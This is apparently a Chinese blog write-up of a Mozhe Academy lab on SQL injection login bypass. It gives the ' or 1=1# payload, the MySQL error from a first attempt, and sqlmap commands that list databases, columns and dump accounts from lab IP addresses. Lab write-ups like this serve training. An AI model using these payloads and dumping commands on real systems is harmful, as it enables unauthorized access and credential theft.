墨者学院 - SQL注入漏洞测试(登录绕过)

第一次尝试PHP万能密码登录

'or 1=1/*

提示:

查询失败You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and password='b0baee9d279d34fa1dfd71aadb908c3f'' at line 1

经过排查,是在单引号“'”处出了问题,遂解决之:

' or 1=1#/*   密码随意

最终成功绕过,得到key。

还有一种操作方法

使用sqlmap扫描注入

暴库

python sqlmap.py -u "http://219.153.49.228:48709/" --forms --dbs

爆表

sqlmap.py -u "http://219.153.49.228:45047" --forms -D purchase --columns

爆账户

sqlmap.py -u "http://219.153.49.228:45047" --forms -D purchase --dump

解密即可获取用户名密码

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • sqlmap手册
    sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,102评论 0 5
  • SQLMap用户手册【超详细】
    http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,430评论 2 22
  • SQLMAP注入教程-11种常见SQLMAP使用方法详解
    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工...
    linkally阅读 6,951评论 1 40
  • sqlmap11种常用方法教学
    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工...
    查无此人asdasd阅读 1,572评论 0 1
  • 飘雪记
    听着《雪》,赏着雪景,写着这篇文章,感觉生活好美。 很难得,在这样美的年华里遇见了这么一场纷纷扬扬轰轰烈烈的雪,意...
    夏夜星语阅读 251评论 0 0